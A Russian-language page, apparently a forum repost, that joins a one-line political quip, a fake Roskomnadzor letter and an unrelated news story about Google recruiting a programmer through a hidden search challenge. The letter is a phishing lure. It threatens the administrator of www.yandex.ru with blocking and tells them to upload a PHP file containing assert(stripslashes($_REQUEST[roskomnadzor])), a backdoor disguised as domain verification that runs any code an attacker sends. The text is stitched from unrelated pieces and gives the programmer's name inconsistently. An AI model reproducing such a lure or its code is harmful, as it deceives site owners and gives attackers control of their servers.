Повезло Довженко. При Путине получил-бы двадцаточку
posted via robin poster
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.yandex.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
Однажды Программист Марк Розетт, который сейчас работает в Google, увидел в результатах поиска одноименного поисковика послание «Готов к проверке?» и ответил на него утвердительно. После этого попал на закрытый сайт, решил несколько задач и был приглашен на работу в компанию.
Три месяца назад Макс Розетт сидел за компьютером и возился с Python. К тому моменту он уже поработал в крупной консалтинговой конторе, но решил несколько сменить профиль и стать разработчиком. Розетт поступил на мастерскую программу по информатике (бакалавра по математике он получил в Йельском университете) и потихоньку улучшал свои навыки.
Тем утром Розетт написал в поисковой строке Google «python lambda function list comprehension» и стал просматривать результаты. Вдруг они раздвинулись и появилось сообщение на черном фоне: «Ты наш человек. Готов к проверке?»
«Я уставился в экран. Что это было? Спустя пару мгновений я точно решил, что готов попробовать», — рассказал Макс Розетт.
Кликнув на фразу «Я хочу сыграть», программист попал на страницу, озаглавленную как «foo.bar» (это широко использующиеся в программировании метапеременные). На экране было нечто похожее на интерфейс Unix. Розетт запросил список файлов и обнаружил только один под названием «start_here.txt» («начни с этого»). Внутри было две строчки «Введите request, чтобы запросить задание. Введите help, чтобы получить список команд».
Макс Розетт запросил задание. По его словам, в тот момент он был готов к тому, что на экране появится надпись «Следуй за белым кроликом, Макс». Но вместо этого открылась задача и инструкции, как отправить решение. На задание программисту отвели 48 часов. Отсчет пошел.
Первую задачу Макс Розетт решил за пару часов. Как выглядело задание, он не рассказал, но ему понадобились знания алгоритмов. Написать программу можно было на языках Java или Python. Код автоматически прогонялся через пять тестов. За следующие две недели Розетт решил еще пять задач. После решения шестой ему предложили указать контактную информацию. Программист дал свои данные. Через пару недель ему написали из отдела подбора персонала Google.
Вскоре программист отправился в штаб-квартиру поисковика в Маунтин-Вью, где целый день решал задачи на доске. По словам Розетта, это был первый день, когда он понял, что все это не розыгрыш. Через пару недель стало ясно, что Google берет программиста на работу. Через три месяца он стал работать в поисковике.